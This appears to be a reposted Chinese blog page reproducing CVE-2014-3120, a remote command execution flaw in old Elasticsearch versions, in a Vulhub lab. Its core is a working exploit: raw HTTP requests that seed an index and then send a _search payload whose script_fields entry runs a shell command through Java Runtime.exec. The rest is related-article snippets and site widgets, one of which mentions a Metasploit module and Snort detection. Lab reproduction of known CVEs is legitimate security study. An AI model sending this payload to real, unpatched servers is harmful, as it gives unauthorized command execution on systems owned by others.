ElasticSearch 命令执行漏洞(CVE-2014-3120)

最新推荐文章于 2024-05-16 14:07:28 发布
最新推荐文章于 2024-05-16 14:07:28 发布
阅读量341 收藏
点赞数
文章标签: 大数据 java runtime
原文链接:http://www.cnblogs.com/mrhonest/p/11349741.html
版权 
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

1431916-20190814085252666-1115375657.png

该漏洞需要es中至少存在一条数据,若没有,需要先创建一条数据

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/

转载于:https://www.cnblogs.com/mrhonest/p/11349741.html

ddr12231
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞CVE-2015-1427)被发现,影响...
CVE-2014-3120 ElasticSearch 命令执行漏洞
weixin_51387754的博客
11-16 1835
漏洞简介 ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。 ElasticSearch有脚本执行的功能,使用的引擎为MVEL,该引擎没有做任何的防护,或者沙盒包装,所以可以直接执行任意代码。 由于在ElasticSearch的默认配置下,动态脚本执行功能处于打开状态,导致用户可以构造恶意的请求包,执行任意代码。 漏洞复现 通过_search方法的参数传入恶
CVE漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 654
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。进入MSF框架,search CVE-2014-3120,然后进入对应模块,设置好参数即可攻击。本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场。检测环境端口是否开放。
ElasticSearch 命令执行漏洞CVE-2014-3120)(1)
最新发布
2401_84545669的博客
05-16 361
本文内容仅为技术科普,请勿用于非法用途!
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
elasticsearch-analysis-dynamic-synonym-7.6.2
08-17
Elasticsearch(ES)作为一款强大的全文搜索引擎,同样支持对同义词的处理。`elasticsearch-analysis-dynamic-synonym-7.6.2`是一个专为ES7.6.2版本设计的动态同义词插件,旨在实现同义词的动态加载和管理,使得同义...
elasticsearch-analysis-ik-7.12.1
05-08
**Elasticsearch 分析插件 IK Analysis** **一、IK Analysis 概述** IK Analysis(全称:Intelligent Chinese Analysis)是针对 Elasticsearch 的一个强大且成熟的中文分词插件,专为处理中文文本分析而设计。它...
ES文件浏览器打开端口漏洞--- CVE-2019-6447:ES文件资源管理器打开端口漏洞-CVE-2019-6447
02-18
ES文件浏览器打开端口漏洞--- CVE-2019-6447:ES文件资源管理器打开端口漏洞-CVE-2019-6447
javasnmp源码-IDS-Evasion:规避Snort入侵检测系统
06-04
java snmp源码IDS-规避 指数 Snort 可以识别的攻击 ElasticSearch动态脚本任意Java执行(): 大多数 snort 规则都被注释掉了。 因此,我们需要通过产品名称(即在我们的示例中为“ElasticSearch”)或更好地通过 CVE(即在我们的示例中为“CVE-2014-3120”)来搜索它们并取消注释它们(即从行的开头),以便启用它们。 为此,我们可以使用Select-String命令(PowerShell 中的“grep-like”命令): 运行 snort: 我们将使用“exploit/multi/elasticsearch/script_mvel_rce”模块来利用这个漏洞(你可以使用search ElasticSearch或在Metasploit中search CVE-2014-3120找到这个模块)。 设置模块选项,检查目标是否存在漏洞,最后运行模块: 检查 Snort: 如我们所见,snort 成功识别了攻击。 FTP 身份验证扫描程序 (): 我们将使用“auxiliary/scanner/ftp/ftp_login”模块对目标FTP服
elasticsearch漏洞监测工具
09-17
elastiecsearch 的漏洞检测工具,对于elastiecsearch 在配置上或者版本上存在的问题有很好的检测和利用价值。
elasticsearch-analysis-ik-6.8.0.zip
07-16
Elasticsearch 分析插件 IK 分词器是用于优化 Elasticsearch 搜索引擎中文处理的重要工具。在中文环境下,正确的分词对于提升搜索质量和精确性至关重要。IK 分词器因其高效的性能和丰富的自定义功能,在 Elastic...
elasticsearch-analysis-pinyin-7.12.1.zip
11-05
安装插件的方法是在Elasticsearch的根目录下执行以下命令(假设你的Elasticsearch版本与插件版本匹配): ```bash bin/elasticsearch-plugin install file:///path/to/elasticsearch-analysis-pinyin-7.12.1.zip ``...
elasticsearch-analysis-ik-7.9.0.zip
09-08
Elasticsearch是一个高度可扩展的开源全文本搜索和分析引擎。它使您可以快速,近乎实时地存储,搜索和分析大量数据。它通常用作支持具有复杂搜索功能和要求的应用程序的基础引擎/技术。 elasticsearch-analysis-ik-...
ElasticSearch命令执行漏洞(CVE-2014-3120)
ANOrange的博客
03-30 649
Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 影响版本:ES
ElasticSearch 命令执行漏洞CVE-2014-3120),我的头条面试经历分享
jixuczy的博客
04-03 1174
返回201状态码,代表创建成功;利用该漏洞的Payload如下**:**Accept:MSIE 9.0;Win64;x64;
CVE-2014-3120命令执行漏洞
浅笑996的博客
11-21 2476
环境配置 启动docker环境 cd vulhub-master/elasticsearch/CVE-2014-3120/ sudo docker-compose up 9200 端口已开启 访问目标的9200,会出现Elasticsearch的信息: 利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据,采用Burp发送数据包: POST /website/blog/ H...
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
03-07
elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值